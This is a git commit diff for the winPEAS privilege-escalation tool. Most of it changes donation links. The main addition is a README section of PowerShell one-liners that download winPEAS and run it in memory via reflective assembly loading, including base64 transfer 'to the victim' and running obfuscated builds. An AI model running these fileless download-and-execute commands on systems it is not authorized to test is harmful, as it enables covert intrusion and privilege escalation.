winPEASv2
This commit is contained in:
kali
parent
1f3d067ab2
commit
f2b66bc711
2
.github/FUNDING.yml
vendored
2
.github/FUNDING.yml
vendored
@ -1 +1 @@
|
||||
custom: ['https://www.buymeacoffee.com/carlospolop']
|
||||
custom: ['https://www.patreon.com/peass']
|
||||
|
||||
@ -22,7 +22,7 @@ If you want to **add something** and have **any cool idea** related to this proj
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.buymeacoffee.com/carlospolop)
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Looking for a useful Privilege Escalation Course?
|
||||
|
||||
|
||||
@ -295,7 +295,7 @@ If you want to **add something** and have **any cool idea** related to this proj
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.buymeacoffee.com/carlospolop)
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Looking for a useful Privilege Escalation Course?
|
||||
|
||||
|
||||
@ -16,7 +16,7 @@ If you want to **add something** and have **any cool idea** related to this proj
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=DED2HWDYLFT2C&source=url)
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Looking for a useful Privilege Escalation Course?
|
||||
|
||||
|
||||
@ -129,6 +129,10 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
|
||||
|
||||
[More info about icacls here](https://ss64.com/nt/icacls.html)
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Let's improve PEASS together
|
||||
|
||||
If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** and we will update the master version.
|
||||
|
||||
@ -12,7 +12,47 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac
|
||||
|
||||
**.Net >= 4.5 is required**
|
||||
|
||||
Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
|
||||
Precompiled binaries:
|
||||
- Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/binanries/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
|
||||
- Non-Obfuscated [winPEASany.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe)
|
||||
- Non-Obfuscated [winPEASx64.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe)
|
||||
- Non-Obfuscated [winPEASx86.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe)
|
||||
|
||||
```bash
|
||||
#One liner to download and execute winPEASany from memory in a PS shell
|
||||
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
|
||||
|
||||
#Before cmd in 3 lines
|
||||
$url = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe"
|
||||
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
|
||||
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
|
||||
|
||||
#Load from disk in memory and execute:
|
||||
$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe")));
|
||||
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
|
||||
|
||||
#Load from disk in base64 and execute
|
||||
##Generate winpeas in Base64:
|
||||
[Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt
|
||||
##Now upload the B64 string to the victim inside a file or copy it to the clipboard
|
||||
|
||||
##If you have uploaded the B64 as afile load it with:
|
||||
$thecontent = Get-Content -Path D:\Users\victim\winPEAS.txt
|
||||
##If you have copied the B64 to the clipboard do:
|
||||
$thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string
|
||||
##Finally, load binary in memory and execute
|
||||
$wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent))
|
||||
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
|
||||
|
||||
#Loading from file and executing a winpeas obfuscated version
|
||||
##Load obfuscated version
|
||||
$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe")));
|
||||
$wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program"
|
||||
[<ReflectedType_from_before>]::Main("") #Used the ReflectedType name to execute winpeas
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
```bash
|
||||
winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs)
|
||||
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
|
||||
@ -20,7 +60,8 @@ winpeas.exe notcolor #Do not color the output
|
||||
winpeas.exe wait #wait for user input between tests
|
||||
winpeas.exe debug #display additional debug information
|
||||
winpeas.exe log #log output to out.txt instead of standard output
|
||||
winpeas.exe -lolbas -linpeas=http://127.0.0.1/linpeas.sh #execute also additional LOLBAS search check and linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
|
||||
winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
|
||||
winpeas.exe -lolbas #Execute also additional LOLBAS search check
|
||||
```
|
||||
|
||||
## Basic information
|
||||
@ -216,6 +257,10 @@ If you find any issue, please report it using **[github issues](https://github.c
|
||||
|
||||
**WinPEAS** is being **updated** every time I find something that could be useful to escalate privileges.
|
||||
|
||||
## Please, if this tool has been useful for you consider to donate
|
||||
|
||||
[](https://www.patreon.com/peass)
|
||||
|
||||
## Advisory
|
||||
|
||||
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
|
||||
|
||||
Loading…
Reference in New Issue
Block a user